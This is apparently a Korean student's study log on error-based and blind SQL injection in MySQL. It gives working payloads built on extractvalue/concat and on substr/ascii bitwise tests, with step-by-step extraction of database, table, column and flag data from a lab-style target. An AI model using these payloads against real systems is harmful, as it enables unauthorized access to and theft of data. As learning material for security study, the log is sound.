[기록일지] 📚 07주차 (💉SQL Injection - Error Based/Blind)

Error Based Sqli

---

SQL 질의 결과가 화면에 출력되는 경우에 UNION SQLi를 사용했다.

그렇다면 결과가 아닌 에러(Error) 메시지가 출력되는 경우에는 어떻게 해야할까?

이때 우리는 Error Based SQLi를 생각해 볼 수 있다. 쿼리의 실질적인 결과는 출력되고 있지 않지만 오류가 났을 경우에 오류 메시지가 노출되고 있다면, 이를 이용하여 데이터를 추출할 수 있다는 것이다.

그럼 어떤 경우에 Error Based SQLi를 사용할 수 있는지 생각해보자!

당연하게도 에러 메시지를 활용해서 데이터를 출력하는 방법이기 때문에, 우선 에러 메시지가 화면에 출력되는 곳이여야 한다.

---

Error ?!

에러(Error) ... 에러의 종류는 다양하다. 그럼 Error Based는 모든 에러에 대하여 활용이 가능한 것인가?

아니다.! 그렇지 않다.!

에러에도 의미있는 에러가 있고, 의미없는(쓸모없는)에러가 있다는 것을 우리는 인지할 필요가 있다.

 

Syntax Error vs Logic Error

우리는 우선적으로 문법 에러(Syntax Error)와 로직 에러(Logic Error)에 대하여 생각해 봐야한다.

SQL을 수행하는 과정에서 DB는 SQL 질의문(Query) 받아서 검사하고, 수행한다. 이 과정에서 우리가 입력한(원하는) SELECT 문이 실행되어야 한다.

그런데? 만약, 문법 에러(SQL Syntax Error)가 발생하는 경우(작성한 SQL의 문법이 틀린 경우) 실행 자체가 되지 않는다. SQL이 실행 되기도 전에 에러가 나버린다는 것이다. 이런 경우 의미가 없는 에러가 발생하고 우리는 이를 써먹을 수 없다.

따라서 우리는 로직 에러를 이용해야 한다.

문법적으로는 문제가 없지만 실행하는데 있어서 문제(에러)가 발생하는 경우를 말한다. 하지만, 로직 에러라고 해서 모두 활용 가능한 것은 아니다. 코드의 어디에서든 발생하는 로직 에러가 모두 의미 있는 것은 아니라는 것이다.

SQL 에러여야만 한다는 것을 생각해야 한다.

즉 코드(Code)를 컴파일(Complie)하고 실행(Execute)하는 과정에서 발생 가능한 여러가지 에러들 중에서 서버측 코드가 실행하다 발생하는 에러들이 아닌, SQL 수행중에 발생하는 SQL Logic Error 가 발생한 경우에 우리는 Error Based SQLi를 활용할 수 있다.

Error Based SQLi에서는 SQL 수행 중에 문제를 일으켜 발생한 에러인 SQL Logic Error에 의미를 찾을 수 있다.

---

Error를 유발하는 방법

Error Based SQL Injection을 수행하기 위해 에러를 의도적으로 만들어낼 필요가 있다.

그렇다면 우리는 에러를 어떻게하면 발생 시킬 수 있는가?! 에 대하여 생각해 보아야한다.

Logic Error를 유발하는 방법은 MySQL, Oracle, MsSQL 등등 DB마다 다르다. 이는 따로 정리할 필요가 있지만, 우선 MySQL를 활용하여 웹 개발을 진행 중이기 때문에 이에 대하여 살펴볼 것이다.

 

ExtractValue 함수

MySQL의 extractvalue 함수는 두개의 파라미터(params) xml 데이터, xml 표현식을 인자로 하는 함수로 xml 데이터에서 어떤 특정한 데이터를 추출하는 함수이다.

extractvalue(xml data, XPATH expression)

즉 첫번째 인자로 주어진 데이터에서 두번째 인자로 주어진 값을 찾아 추출하는 것이다.

이때 첫번째 인자가 아니고 두번째 인자에 적절하지 않은 값이 들어간다면? 에러가 발생한다.

(아무 에러가 아닌 Xpath 표현식 에러를 유발 해야한다.)

ERROR 1105 (HY000): XPATH syntax error: 'xpath_expr 인수의 값'

우리는 이를 이용하여 두번째 인자에 규칙에 어긋난 값을 삽입하여 의도적으로 에러를 발생시키고, 이를 활용할 것이다.

XPATH expression 규칙에 어긋나는 값

@는 사용이 가능하지만, 그 외의 특수문자들은 안된다.
일반적으로 0x3a 즉 ' 콜론(:) ' 을 이용한다.

 

ExtractValue 활용

그렇다면 extractvalue를 어떤식으로 활용하면 될까?

우리는 에러 메시지를 활용해서 SQL 질의문을 삽입하고, 데이터를 추출하는 것을 목표로 한다. 

그러므로 (SELECT ~ )와 같이 SELECT 문의 결과를 에러 메시지에 포함시켜야 한다. 그렇다면 SELECT 문의 결과를 어떻게 에러 메시지에 포함시킬까?

우선 아래와 같이 extractvalue('xml 글자', 'xml 표현식')를 이용한 경우를 생각해보자.

'and extractvalue('1',':gear')

이 경우에는 ' 가 하나 비기 때문에 문법 에러가 발생한다.

'and extractvalue('1',':gear') and '1'='1

위와 같이 '를 맞춰 주었지만 콜론(:)을 그냥 입력하는 경우 에러가 발생하지 않는다. 

그 이유는 콜론(:)을 그냥 입력하는 경우 그대로 입력되지 않아서 에러를 유발하지 않는 것이다. 그래서 우리는 콜론( :)이 제대로 인식하게 할 필요가 있다.

그래서 우리는 concat을 이용한다.

 

Concat 함수 활용

gear' and extractvalue('1',concat(0x3a, (select 'gear'))) and '1'='1 

concat 은 두 인자를 붙여주는 함수이다. 그래서 위의 결과의 경우 concat(0x3a, (select 'gear')) 에서 0x3a는 : 이기 때문에 ':gear' 가 되게 된다.

그런데 이때 콜론(:)은 에러가 발생시키게 되고, 아래와 같은 에러가 발생하게 된다.

XPATH syntax error ':gear'

여기서 주의할 점은 다음과 같다.

concat을 이용한다고 아래와 같이 입력하면 의미가 없다.

concat( :, 'gear')

물론 잘 이어 붙여져서 :gear이 되지만 이때의 콜론(:)은 그대로 입력되지 않는다. 그래서 우리는 콜론(:)을 0x3a로 입력해주는 것이다.

결론적으로 이를 통해 콜론(:) 뒷부분에 우리가 입력한 값에 대한 에러가 발생하는 것을 볼 수 있다. 

따라서 우리는 Error Based SQLi를 활용하기 위해 우리는 다음과 같이 입력한다.

gear' and extractvalue('1',concat(0x3a, (select ~~))) and '1'='1

이와 같이 입력하면 SELECT문은 SQL 질의(Query)로서 정상적으로 실행될 수 있고, 에러를 발생시키기 위한 특수문자 (:)를 SELECT문에 붙여주어 해당 에러의 결과를 화면에서 볼 수 있게 되는 것이다.

SELECT문에 '적절한 공격 format'을 입력한다면 원하는 데이터를 추출할 수 있게 된다는 것이다.

---

Error Based SQLi Process

06주차에 진행한 UNION SQLi의 과정과 별반 다르지 않다. 사용하는 공격 format이 다를 뿐이다.

그러므로 Error Based SQL Injection 또한 정해진 순서대로만 따라가면 되는 Process가 존재한다는 것이다.

(그저 무조건! 따라주기만 하면 되는 것이다.)

Error Based SQL Injection Process

1. SQL Injection 포인트 찾기 (가능 여부 확인하기) - Data 출력 확인 
2. 에러를 유발하는 함수를 DB의 종류에 맞춰 확인하기 - Error 발생 함수 TEST
3. 공격 format 만들기
4. DB 이름 확인
5. Table 이름 확인
6. Column 이름 확인
7. Data 추출

 

[1] SQL Injection Point 찾기

SQL Injection 공격을 수행하기 위해서는 SQL Injection이 가능한지부터 확인해야 한다.

x' and '1'='1 

x' and '1'-'1 을 입력하여 SQL삽입이 일어났음에도 정상적으로 Query가 동작하는지 확인해본다.

그 다음으로 우리는 Error Based를 활용하기위해 x' 를 입력하여 에러 메시지가 나타나는지 확인 해본다.

x'

위와 같이 입력하면 '의 개수가 맞지 않아서 에러가 발생하고 에러가 화면에 출력된다면 우리는 Error Based를 활용해봐야 한다는 생각을 해볼 수 있다.

 

[2] Error를 유발하는 함수

우리는 에러를 내기 위해서 에러(Error)를 발생시키는 함수에 대하여 확인해봐야 한다. 이는 DB 별로 다르므로 어떤 DB를 사용하고 있는지 확인하고 이에 맞춰 찾아서 사용하면된다.

우선 MySQL에서는 extractvalue를 활용하고, 여기서는 이를 기반으로 진행할 것이다.

 

[3] 공격 Format 만들기.

x' and extractvalue('1',concat(0x3a,(______))) and '1'='1

항상 공격 Format 을 우선적으로 만들어두고 해야 쓸데없이 오타로 인해 발생하는 에러들을 발생시키지 않을 수 있다.

 

이제 우리는 해당 빈칸에 SQL삽입을 통해 원하는 데이터를 출력하기 위한 SELECT문을 삽입하면 된다.

 

[4] DB 이름 알아내기

DB 이름을 알아내기 위해서는 다음과 같은 select 구문을 사용하면 된다.

select database()

그럼 이를 공격 포맷에 넣어준다.

x' and extractvalue('1',concat(0x3a,(select database()))) and '1'='1

그럼 에러결과에 우리가 원하는 데이터 베이스의 이름이 출력될 것이다.

ex) XPATH syntax error: ':segfault_sql'

 

[5] Table 이름 알아내기

Table 이름을 알아내기 위해서 우리는 다음과 같은 select 구문을 사용한다.

select table_name from information_schema.tables where table_schema = 'segfault_sql'

이를 공격 포맷에 넣어준다.

x' and extractvalue('1',concat(0x3a,(select table_name from information_schema.tables where table_schema = 'segfault_sql'))) and '1'='1

여기서 우리는 아래와 같은 에러가 발생하는 경우를 생각해 봐야한다.

Subquery returns more than 1 row

아... 여러 행이 나오고 있구나! ,limit을 이용하여 한줄만을 출력하자!

select table_name from information_schema.tables where table_schema = 'segfault_sql' limit 0,1

위와 같이 limit 0,1을 넣어주어 rows -> row로 하나의 행만을 나오게 해주는 select 구문을 바꿔주고 이를 공격 포맷에 넣어준다.

x' and extractvalue('1',concat(0x3a,(select table_name from information_schema.tables where table_schema = 'segfault_sql' limit 0,1))) and '1'='1

그럼 우리는 Table의 이름들을 확인해 볼 수 있다.

SELECT command denied to user 'errSqli'@'localhost' for table 'tables'

위와 같은 에러가 발생하는 경우는 접근 권한이 없는 테이블에 접근하는 경우이다.

 

[6] Column 이름 알아내기

Column의 이름을 알아내기 위해서 우리는 다음과 같은 select 구문을 사용한다.

select column_name from information_schema.columns where table_name = 'secret' limit 0,1

이를 공격 포맷에 넣어준다.

x' and extractvalue('1',concat(0x3a,(select column_name from information_schema.columns where table_name = '
secret' limit 0,1))) and '1'='1

 

[7] 데이터 출력하기

DB, Table, Column의 이름들을 다 알아냈다면 우리는 데이터(data)를 알아낼 수 있다. 

select flag from secret limit 0,1

이를 또한 공격 포맷에 넣어준다.

x' and extractvalue('1',concat(0x3a,(select flag from secret limit 0,1))) and '1'='1

이와 같은 방식으로 우리는 에러를 기반으로 하여 원하는 데이터를 알아낼 수 있는 것이다.

 

 

Blind Sqli

---

지금까지 다룬 UNION SQLi와 Error Based SQLi는 SQL 질의(Query)의 결과 혹은 오류가 화면에 나오는 경우였다.

그렇다면 결과가 화면에 노출되지 않는 경우(보이지 않는 경우)에는 어떻게 해야할까?

보이지 않는다고 공격이 불가능한 것이 아니다. 이를 활용한 방식이 Blind SQL Injection이다.

그렇다면 질의(Query)의 결과가 보이지 않는데 어떻게 정보를 추출하는 것일까?

화면상에서 확인이 불가능하다면 데이터를 가져와도 소용이 없는 것이 아닐까?

하지만 우리는 이를 참과 거짓의 응답 차이를 이용하여 알아낼 수 있다.

ex)  로그인, 아이디 중복 체크

 

True / False ?!

참과 거짓?! 이게 무슨 의미가 있나 싶겠지만 우리는 친숙한 게임을 하나 알고 있다.

바로 '스무고개' 이다.

우리는 스무고개 처럼 참/거짓으로 대답 가능한 질문을 계속해서 던지고 이를 이용하여 값을 찾아내는 것이다.

특정 요청에 대하여 참인 경우와 거짓인 경우에 응답이 다르다면?! 이를 이용하여 우리는 이런 질문을 던질 수 있다.

substr((select ~~ ),1,1) = 'a'

"혹시 해당 쿼리 결과의 맨 앞글자가 a 야?"  라고 substr을 사용하여 물어볼 수 있다.

그럼 참/거짓으로 직접적으로 대답해주지는 않지만, 우리는 응답의 차이를 통해 참인지 거짓인지 확인할 수 있다.

substr((select ~~ ),2,1) = 'b'

"다음 글자는 b인가?" 이런식으로 계속해서 질문을 이어나가면서 원하는 데이터의 정보를 완성해 가는 것이다.

 

Substr 함수

substr 함수는 substr('문자', 시작 위치, 개수) 와 같이 이루어져 있는 글자를 잘라주는 함수이다.

그래서 다음과 같이 생각하면 된다.

substr('test',1,1)  -> 't'
substr('test',1,2) -> 'te'
substr('test',2,1) -> 'e'

---

 

Blind SQLi Process

Blind SQLi 또한 정해진 순서대로만 따라가면 되는 Process가 존재한다.

(그저 무조건! 따라주기만 하면 되는 것이다.)

Blind SQL Injection Process

1. SQL Injection Point 찾기 (참/거짓 조건 확인)
2. SELECT 문구가 가능한지 확인
3. 공격 format 만들기 (결과의 첫 글자 비교 확인)
4. DB 이름 확인
5. Table 이름 확인
6. Column 이름 확인
7. Data 추출

 

ASCII Table

우리는 Blind SQLi를 이용함에 앞서 아스키표(ASCII Table)에 대하여 알고 있어야한다. 우리는 참/거짓의 차이를 통해 ASCII 값을 찾아내고 이를 변환하여 데이터의 정보를 찾아내는 것이다.

위의 표를 보면서 우리는 몇가지 생각을 해봐야 한다.

 

Search Method

탐색 방식에 대하여 생각할 점

1. 질문의 범위
  0 ~ 127 (일반적으로 입력가능한 모든 값은 ASCII Code로 변환이 가능하고 아스키 코드는 0 ~ 127의 범위를 가지고 있으므로 이를 벗어나는 값은 확인할 필요가 없다.)


2. 질문의 방식
- 선형 탐색
 0 ~ 127 까지의 범위를 차례대로(순서대로) 하나씩 확인한다면?  한 글자당  최대 2^7 (128) 번을 확인해야하는데 글자가    10글자만 되더라도? 무려....1280번이다. - 선형 탐색의 시간 복잡도 O(n)
   
- 이진(이분) 탐색
 그래서 우리는 이진 탐색 방식을 생각해볼 수 있다.
우선 0보다 큰지 확인한다. (이는 해당 값이 존재하는지를 확인하는 것이다.)
그 다음 0 ~ 127 사이의 어느 값을 확인한다. 우리가 주로 이용하는 값은 33 ~ 126이다. 그럼 우리는 이 사이의 값을 생각해 볼 수 있는데 (33+126)/2 = 79.5 이다. 그러므로 대충 70 부터 시작해준다. 해당 값보다 큰가? 작은가? 를 확인하고 가능한 최대값과 최솟값의 중앙값을 확인하는 방식을 반복한다. 값을 잘 선택한다면 최대 7번 안에 알아낼 수 있을 것이다. - 이진 탐색의 시간 복잡도 O(log n)

- 논리 연산(이진 코드 활용)
 이분 탐색과 다르지 않지만 우리는 질문의 방식을 다르게 이용할 수 있다.
값이 몇보다 큰가? 작은가? 를 확인하는게 아니고 이진값을 이용하여 질문하는 것이다.
바로 논리 연산자 & 를 활용하는 것이다. &1=1, &2=2 ... &64=64 와 같이 1, 2, 4, 8, 16, 32, 64 의 값을 물어본다면? 0000000 ~ 1111111 값의 각 자리의 결과가 0인지 1인지를 물어본 것과 같은 효과를 가진다.
즉 각 값이 참이면 1 거짓이면 0으로 이진값을 알아내고 이를 십진수로 바꿔서 값을 알아내는 것이다.

사람마다 다를 수 있지만 논리연산을 이용한 방법이 가장 잘 맞는거 같아 이 방법을 이용할 것이다.     

 

[1] SQL Injection Point 찾기

SQL Injection 공격을 수행하기 위해서는 SQL Injection이 가능한지부터 확인해야 한다.

x' and '1'='1 

x' and '1'-'1 의 값이 참이라는 결과가 나온다면 SQL Injection이 가능하다.

하지만 여기서 우리는 Blind SQLi을 이용할 것이므로 거짓도 확인해야한다.

x' and '1'='2

x' and '1'='2 가 거짓으로 결과가 나오는 것을 확인하고, 참/거짓이 둘다 찾아지고,  참(True)인 결과와 거짓(False)인 결과가 다르다면 Blind SQL Injection이 가능하다는 것이다.

참과 거짓을 둘 다 찾아야 한다!!

 

[2] SELECT 문구가 가능한지 확인

x' and ((select 'test') = 'test') and '1'='1

위와 같은 구문을 이용하여 해당 값이 참인지를 확인하여 SELECT 문을 삽입해도 문제가 없는지 확인한다.

 

[3] 공격 Fromat 만들기

x' and (__조건__) and '1'='1

위와 같이 ( ) 에 원하는 조건을 넣어준다. 

substr((__SQL__),1,1)

조건의 경우 위와 같이 넣어주면 된다. SQL 부분에는 select 구문을 삽입하고 이를 합쳐주면 다음과 같다.

x' and (substr((select 'test'),1,1) = 't') and '1'='1

위와 같이 만들어 주면된다. 그런데 여기서 우리는 't'와 같이 문자를 확인하는 것이 아니고 ASCII를 이용할 것이다.

숫자가 편하기 때문이다.

ascii('a') = 97 이기 때문에 이를 바꿔주면 다음과 같다.

x' and (ascii(substr((select 'test'),1,1)) = 97) and '1'='1

위와 같은 방식으로 완성 하면되는데 우리는 우선적으로 공격 Format만 구성한다고 생각하면 ascii(substr((__SQL__),1,1)) > 0을 넣어주어 다음과 같이 만들어 둘 수 있다.

x' and (ascii(substr((__SQL__),1,1)) > 0) and '1'='1

근데 이때 이를 논리연산을 이용하는 방식을 이용할 것이기 때문에 그에 맞춰 바꿔주면 다음과 같다.

x' and (ascii(substr((__SQL__),1,1)))&1=1#

위의 공격 format을 사용하여 진행할 것이다.

 

[4] DB 이름 알아내기

x' and ascii(substr((select database()),1,1))&1=1#

1=1, 2=2, 4=4, 8=8, 16=16, 32=32, 64=64 와 같이 이진수 7자리를 각각 확인하고 참인 값에 대하여 각각을 더해주면 십진수가 나오고 이를 ASCII 로 변환하면 해당 문자가 어떤 문자인지 확인할 수 있다.

x' and ascii(substr((select database()),2,1))&1=1#

이런식으로 문자의 자리수를 바꿔주면서 계속해서 해당 문자가 어떤 문자인지 확인하는 작업을 계속한다.

 

[5] Table 이름 알아내기

select table_name from information_schema.tables where table_schema = 'blindSqli'

이를 공격 format에 넣어준다.

x' and (ascii(substr((select table_name from information_schema.tables where table_schema = 'blindSqli'),1,1)))&1=1#

 

[6] Column 이름 알아내기

select column_name from information_schema.columns where table_name = 'flagTable' limit 0,1

이를 공격 format에 넣어준다.

x' and ascii(substr((select column_name from information_schema.columns where table_name = 'flagTable' limit 0,1),1,1))&1=1#

 

[7] 데이터 추출하기

select flag from flagTable limit 0,1

x' and ascii(substr((select flag from flagTable limit 0,1),1,1))&1=1#

이와 같은 방법으로 반복하면 우리는 우리가 원하는 데이터를 확인할 수 있게 된다.

하지만 이 작업은 노가다성이기 때문에 파이썬을 이용한 자동화를 고민해봐야 한다.

그렇지만 Blind SQLi의 경우 자동화 하기 전에 꼭! 손으로 수작업으로 노가다를 해봐야 이해하는데에 도움이 된다는 사실을 잊지말자!

---

SQL Injection

1. SQL 질의문(Query)의 결과가 화면에 출력되는 경우 : UNION SQL
2. SQL 에러 메시지가 화면에 출력되는 경우 : Error Based SQLi
3. 결과가 출력되지 않고 참과 거짓의 응답만 다른 경우 : Blind SQL Injection

 

 

---

질문 환영, 수정 및 보완에 대한 지적 환영